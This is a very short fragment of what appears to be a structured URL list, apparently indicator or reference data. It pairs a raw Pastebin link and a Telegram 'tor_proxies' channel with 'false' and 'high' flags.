    https://pastebin.com/raw/X2Ddjiv0 false
      		high
      https://t.me/tor_proxies false
        		high